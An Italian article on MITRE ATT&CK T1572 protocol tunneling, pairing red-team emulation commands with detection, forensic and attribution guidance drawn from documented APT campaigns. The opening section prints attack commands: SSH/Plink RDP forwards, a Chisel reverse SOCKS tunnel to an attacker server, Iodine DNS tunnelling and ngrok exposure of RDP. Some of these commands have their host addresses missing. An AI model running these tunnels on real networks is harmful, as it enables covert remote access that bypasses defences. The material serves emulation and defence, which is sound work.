Tunneling di Protocollo: Protocol Tunneling (T1572)

Il tunneling di protocollo si presta magnificamente alle esercitazioni red team perché esistono decine di tool open source pronti all'uso. La chiave è ricreare scenari realistici che riflettano le TTP degli APT documentati, partendo dal più classico: il tunnel SSH.

Per simulare ciò che Magic Hound, FIN6 e Cobalt Group hanno fatto con Plink, il modo più diretto è usare il client SSH nativo. Su una macchina Linux dell'attaccante, il comando per creare un tunnel locale che instradi RDP verso un host interno attraverso un pivot compromesso è:

ssh -L 3389::3389 utente@ -N -f

Il flag -N evita l'apertura di una shell, -f manda il processo in background. Su Windows, dove FIN7 ha usato OpenSSH, la sintassi è identica nel client SSH integrato da Windows 10 in poi. Per replicare l'uso di Plink (open source, parte della suite PuTTY):

plink.exe -ssh -L 3389::3389 utente@ -N -pw

Per scenari più avanzati, Chisel (open source) è il tool scelto da Scattered Spider nella campagna C0027. Chisel funziona come client-server e può operare attraverso proxy HTTP, rendendo il tunneling resistente al filtraggio di rete. Sul server dell'attaccante:

./chisel server --reverse --port 8443

Sul pivot compromesso:

./chisel client :8443 R:socks

Questo crea un proxy SOCKS5 inverso che consente all'attaccante di raggiungere l'intera rete interna. Per il DNS tunneling — come documentato nella campagna Cutting Edge con Iodine (open source) — il setup richiede un dominio controllato dall'attaccante con un record NS configurato. Sul server:

iodined -f -c -P 10.0.0.1 tunnel.dominio-controllato.tld

Sul client nel sistema vittima:

iodine -f -P tunnel.dominio-controllato.tld

Per simulare i tunnel GRE usati da Salt Typhoon su dispositivi di rete, in laboratorio si può configurare un'interfaccia GRE su Linux:

ip tunnel add gre1 mode gre remote local ttl 255

ngrok (freemium) merita una menzione dedicata perché è stato adottato sia da Fox Kitten che da Scattered Spider, oltre a comparire nella campagna SharePoint ToolShell Exploitation. La sua semplicità è disarmante: ngrok tcp 3389 espone istantaneamente una porta RDP attraverso l'infrastruttura cloud di ngrok, bypassando firewall e NAT senza alcuna configurazione.

Per l'incapsulamento C2 in DNS e HTTPS, Cobalt Strike (a pagamento) resta il riferimento — come documentato per Chimera — con profili Malleable C2 che permettono di personalizzare ogni aspetto del traffico tunnelizzato. L'alternativa open source è Mythic (open source), che supporta proxy SOCKS e agenti modulari.

Il tunneling di protocollo presenta una sfida peculiare per la detection: il traffico è spesso cifrato e transita su porte standard. L'approccio vincente è combinare analisi comportamentale, correlazione multi-sorgente e baselining rigoroso del traffico legittimo.

La detection su Windows parte dai log Sysmon. L'EventCode 1 (Process Create) combinato con l'EventCode 3 (Network Connection) è la coppia fondamentale. Processi come plink.exe, ssh.exe, chisel.exe o ngrok.exe che stabiliscono connessioni in uscita devono generare alert immediati, a meno che non siano esplicitamente nella whitelist degli strumenti amministrativi. La correlazione temporale è critica: un processo creato e una connessione di rete entro pochi secondi suggerisce automazione malevola.

Il tuning della soglia di asimmetria dei dati è un parametro spesso sottovalutato. Un tunnel SSH usato per instradare RDP mostra un pattern caratteristico: volumi elevati di dati in entrambe le direzioni sulla porta 22, quando normalmente SSH ha un rapporto asimmetrico. Configurare un alert quando il rapporto tra byte inviati e ricevuti su una singola connessione SSH si avvicina a 1:1 per periodi prolungati riduce i falsi positivi e intercetta i tunnel di tipo port-forwarding.

Su Linux, i log auditd con le syscall connect e bind sono la fonte primaria. Monitorare le flag di configurazione di sshd che indicano port forwarding attivo — in particolare AllowTcpForwarding e GatewayPorts — permette di distinguere un server SSH legittimo da uno sfruttato come pivot. osquery (open source) è particolarmente utile per interrogazioni periodiche sullo stato delle connessioni:

SELECT pid, remote_address, remote_port, local_port FROM process_open_sockets WHERE state = 'ESTABLISHED' AND local_port IN (22, 53, 443, 8443)

Per l'ambiente macOS, i Unified Log catturano l'attività dei processi ssh e socat. Un indicatore affidabile è il traffico TLS in uscita con entropia anomala del payload sui porti standard — segnale di protocolli custom incapsulati in HTTPS, come fa LunarWeb.

La detection del DNS tunneling merita un capitolo a parte. Il volume di query DNS verso un singolo dominio, la lunghezza anomala dei sottodomini (spesso codificati in base64) e il tipo di record (TXT, CNAME, MX usati per trasportare dati) sono indicatori robusti. Sui resolver interni, un alert su query DNS con sottodomini superiori a 50 caratteri ha un tasso di falsi positivi molto basso.

Per gli ambienti ESXi — bersaglio documentato di Scattered Spider — il monitoraggio dei log vpxd e degli output esxcli network è essenziale. Connessioni SSH originate da interfacce di management verso IP esterni, o servizi non previsti nel profilo di sicurezza dell'host, sono anomalie che richiedono indagine immediata.

La ricostruzione forense di un'intrusione che sfrutta il tunneling di protocollo richiede di incrociare artefatti di processo, rete e configurazione, perché il contenuto del tunnel è quasi sempre cifrato e il payload non sarà direttamente ispezionabile.

Su Windows, il punto di partenza sono i Prefetch files. L'esecuzione di plink.exe, ssh.exe, chisel.exe o ngrok.exe lascia tracce in C:\Windows\Prefetch\ con timestamp di prima e ultima esecuzione e conteggio delle run. L'analisi del Prefetch di plink.exe è particolarmente rilevante perché lega direttamente alle TTP di FIN6, Magic Hound e Cobalt Group. Gli Amcache e ShimCache forniscono conferma indipendente dell'esecuzione e, nel caso di ShimCache, anche di binari presenti su disco ma non necessariamente eseguiti.

I log Sysmon, se configurati correttamente, offrono la correlazione processo-rete indispensabile. L'EventCode 1 registra la command line completa — e nei casi documentati, gli operatori spesso lasciano credenziali e indirizzi IP in chiaro nei parametri di Plink. L'EventCode 3 fornisce IP e porta di destinazione, permettendo di ricostruire il grafo delle connessioni C2. L'EventCode 22 (DNS Query) è prezioso per identificare le risoluzioni verso domini di tunneling come i sottodomini di trycloudflare.com documentati per Scattered Spider.

Su Linux, i log auditd con le syscall connect, bind e execve formano la spina dorsale della timeline. Il file ~/.ssh/known_hosts registra le impronte digitali dei server SSH contattati, anche se l'avversario ha rimosso i log. La configurazione di sshd in /etc/ssh/sshd_config va acquisita e comparata con il backup noto, cercando modifiche a AllowTcpForwarding, PermitTunnel e GatewayPorts.

Per i tunnel GRE come quelli creati da Salt Typhoon, l'analisi dei file di configurazione dei dispositivi di rete è cruciale. Le modifiche alla running-config che aggiungono interfacce tunnel GRE con destinazioni esterne non documentate rappresentano un artefatto di compromissione ad alta confidenza.

Le catture di traffico di rete (PCAP), anche se il contenuto è cifrato, offrono metadati preziosi. La dimensione dei pacchetti, la cadenza temporale e i pattern di handshake permettono di distinguere un tunnel SSH che trasporta RDP (pacchetti frequenti di dimensione variabile) da una sessione SSH interattiva (burst irregolari di piccoli pacchetti). I certificati TLS catturati nei flussi HTTPS possono essere confrontati con i database Certificate Transparency per identificare infrastruttura C2.

Nella campagna 2022 Ukraine Electric Power Attack (C0034), l'artefatto chiave fu il software GOGETTER con il suo canale TLS basato su protocollo Yamux: la presenza di binari sconosciuti con connessioni TLS persistenti verso IP non categorizzati è un pattern forense ricorrente per questa tecnica.

Il tunneling di protocollo è una tecnica democratica: la usano attori state-sponsored, gruppi cybercriminali sofisticati e operatori ransomware. Proprio questa trasversalità la rende un indicatore debole per l'attribuzione se presa in isolamento, ma i dettagli implementativi raccontano una storia diversa.

Fox Kitten e Magic Hound — entrambi attori legati all'ecosistema iraniano — condividono l'uso di Plink come strumento di tunneling SSH, ma con sfumature operative distinte. Magic Hound lo impiega specificamente per instradare RDP, suggerendo un focus sull'accesso interattivo ai sistemi compromessi. Fox Kitten aggiunge ngrok e il tool custom SSHMinion al proprio arsenale, indicando una maggiore maturità operativa e la volontà di diversificare i canali di persistenza. Questo overlap parziale di tooling tra i due gruppi iraniani è un pattern ricorrente che suggerisce possibili risorse condivise o accesso allo stesso ecosistema di sviluppo.

Il cluster finanziario composto da FIN6, FIN7 e FIN13 mostra un'evoluzione interessante. FIN6 e FIN7 convergono sull'uso di SSH tunneling (Plink per il primo, OpenSSH per il secondo), mentre FIN13 adotta un approccio diverso basato su web shell e tool Java. Cobalt Group, anch'esso orientato al settore finanziario, si allinea a FIN6 nell'uso di Plink, creando un pattern di tooling condiviso tra gruppi con targeting simile.

Salt Typhoon rappresenta un caso unico nel dataset: l'uso di tunnel GRE tramite modifica delle configurazioni dei dispositivi di rete riflette un livello di accesso e competenza infrastrutturale che va oltre il semplice deployment di tool. Questo approccio è coerente con il targeting del settore telecomunicazioni attribuito al gruppo e suggerisce operatori con esperienza specifica in networking.

Scattered Spider merita attenzione per la varietà del toolkit di tunneling: Chisel, ngrok, Pinggy, MobaXterm (freemium), Teleport — installati su VMware vCenter e VM controllate, come documentato nella campagna C0027 contro telecomunicazioni e BPO. Questa proliferazione di tool indica un approccio opportunistico ma capace, dove la ridondanza dei canali C2 compensa il rischio di detection.

Le sei campagne documentate rivelano un pattern geografico e settoriale significativo. CostaRicto (C0004) ha colpito il settore finanziario nel Sud-est asiatico con tunnel SSH; Cutting Edge (C0029) ha sfruttato vulnerabilità zero-day in appliance VPN con DNS tunneling via Iodine; la campagna SharePoint ToolShell Exploitation (C0058) del 2025 conferma la persistenza della tecnica, con ngrok usato per veicolare payload PowerShell attraverso server SharePoint vulnerabili. L'attacco alla rete elettrica ucraina (C0034) dimostra l'applicazione in contesti ICS/OT, dove il tunneler GOGETTER ha stabilito canali Yamux su TLS — un livello di personalizzazione che distingue gli attori state-sponsored.

Il trend emergente è la convergenza verso strumenti commerciali o SaaS legittimi: ngrok, Cloudflare Tunnel, Pinggy. Questi servizi offrono cifratura, anonimato dell'infrastruttura e difficoltà di blocco senza impatti operativi, rendendo la detection sempre più dipendente dall'analisi comportamentale piuttosto che dalla signature dei tool.

Framework MITRE ATT&CK v16 — T1572 (Protocol Tunneling), TA0011 (Command and Control). Campagne: C0027, C0032, C0034, C0058, C0029, C0004. Mitigazioni: M1037, M1031. Detection: DET0538 con analisi AN1483, AN1484, AN1485, AN1486. Tool di detection: Sysmon, auditd, osquery, Unified Log macOS. Integrato con conoscenza professionale per tool e procedure operative.